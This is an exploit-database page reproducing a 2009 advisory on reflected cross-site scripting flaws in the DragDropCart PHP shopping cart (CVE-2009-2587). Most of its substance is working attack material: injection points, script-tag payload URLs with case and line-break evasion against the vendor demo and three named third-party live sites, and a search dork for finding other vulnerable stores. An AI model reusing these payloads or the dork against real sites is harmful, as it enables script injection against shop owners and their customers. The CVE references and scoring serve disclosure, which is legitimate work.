DragDropCart Remote XSS Vulnerabilities

2009-07-26 / 2009-07-27

Credit: Moudi

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2009-2587

CWE: CWE-79

Dork: [ Store powered by DragDropCart ]

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

        [&#187;] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]

        [&#187;] DragDropCart Remote XSS Vulnerabilities


	[&#187;] Script:             [ DragDropCart ]
	[&#187;] Language:           [ PHP ]
        [&#187;] Download:           [ http://www.dragdropcart.com/ ]
	[&#187;] Founder:            [ Moudi <m0udi@9.cn> ]
        [&#187;] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [&#187;] Team:               [ EvilWay ]
        [&#187;] Dork:               [ Store powered by DragDropCart ]
        [&#187;] Price:              [ $30 ]
        [&#187;] Site :              [ https://security-shell.ws/forum.php ]

===[ Exploit XSS + LIVE : vulnerability ]===

[&#187;] http://www.site.com/patch/ddcart.php?sid=[XSS]
[&#187;] http://www.site.com/patch/getstate.php?country=1&prefix=[XSS]
[&#187;] http://www.site.com/patch/index.php?page=1&search=[XSS]
[&#187;] http://www.site.com/patch/login.php?redirect=[XSS]
[&#187;] http://www.site.com/patch/productdetail.php?product=[XSS]
[&#187;] http://www.site.com/patch/search.php?search=[XSS]


[&#187;] http://www.dragdropcart.com/demo/assets/js/ddcart.php?sid=1<script>alert(649442730777)</script>
[&#187;] http://www.dragdropcart.com/demo/includes/ajax/getstate.php?country=1&prefix=1>"><ScRiPt %0A%0D>alert(712244301211)%3B</ScRiPt>
[&#187;] http://www.dragdropcart.com/demo/index.php?page=1&search=1>"><ScRiPt %0A%0D>alert(312759321896)%3B</ScRiPt>
[&#187;] http://www.dragdropcart.com/demo/login.php?redirect=1>"><ScRiPt %0A%0D>alert(381490124289)%3B</ScRiPt>
[&#187;] http://www.dragdropcart.com/demo/productdetail.php?product=1>"><ScRiPt %0A%0D>alert(387540356725)%3B</ScRiPt>
[&#187;] http://www.dragdropcart.com/demo/search.php?search=1<script>alert(308229169208)</script>

Example in other site:

[&#187;] http://digital-lamps.com/index1.php?page=1&search=1>"><ScRiPt %0A%0D>alert(312759321896)%3B</ScRiPt>
[&#187;] http://www.unitedfoodbank.org/ddcart/index.php?page=1&search=1>"><ScRiPt %0A%0D>alert(312759321896)%3B</ScRiPt>
[&#187;] http://saintscottsdale.com/ddcart/login.php?redirect=1>"><ScRiPt %0A%0D>alert(381490124289)%3B</ScRiPt>

Author: Moudi

References:

http://xforce.iss.net/xforce/xfdb/51877

http://www.osvdb.org/56071

http://www.osvdb.org/56070

http://www.osvdb.org/56069

http://www.osvdb.org/56067

http://www.osvdb.org/56066

http://www.osvdb.org/56065

http://secunia.com/advisories/35925

http://packetstormsecurity.org/0907-exploits/dragdopcart-xss.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

DragDropCart Remote XSS Vulnerabilities

Dork: [ Store powered by DragDropCart ]

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.